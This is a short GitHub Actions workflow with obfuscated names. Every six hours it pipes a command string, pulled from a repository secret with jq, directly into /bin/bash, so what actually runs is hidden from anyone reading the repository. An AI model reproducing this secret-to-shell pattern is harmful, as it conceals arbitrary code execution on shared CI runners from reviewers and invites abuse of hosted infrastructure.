name: chengbuzheng3186
on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengbuzheng3186
        env:
          ome95: ${{ secrets.ome95 }}
        run: |
          echo $ome95 | jq -r .hjuh53994 | /bin/bash
          echo $i7342 | jq -r .fcfix34 | /bin/bash

